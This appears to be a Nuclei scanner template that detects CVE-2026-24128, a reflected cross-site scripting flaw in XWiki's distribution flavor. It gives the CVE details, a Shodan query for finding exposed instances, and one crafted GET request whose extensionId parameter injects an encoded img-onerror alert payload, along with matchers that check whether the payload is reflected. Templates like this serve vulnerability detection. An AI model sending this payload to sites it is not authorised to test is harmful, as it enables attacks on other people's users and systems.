id: CVE-2026-24128 info: name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting author: ritikchaddha severity: medium description: | XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks. reference: - https://jira.xwiki.org/browse/XWIKI-23462 - https://nvd.nist.gov/vuln/detail/CVE-2026-24128 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2026-24128 epss-score: 0.00073 epss-percentile: 0.22198 cwe-id: CWE-79 metadata: verified: true max-request: 1 vendor: XWiki product: xwiki-platform-distribution-flavor-main shodan-query: html:"data-xwiki-reference" tags: cve,cve2026,xwiki,xss http: - raw: - | GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1 Host: {{Hostname}} redirects: true matchers-condition: and matchers: - type: word part: body words: - "

" - "xwiki.extension.job" condition: and - type: word part: content_type words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100b52a96efdf47bea8af2aa4a8981f40f56c5e1475e787e688fd37ede4ae38c283022100db31f9bd7d1c4edbe5428d069569ea59b488b78c6134013fb924ec9c22f8fd36:922c64590222798bb761d5b6d8e72950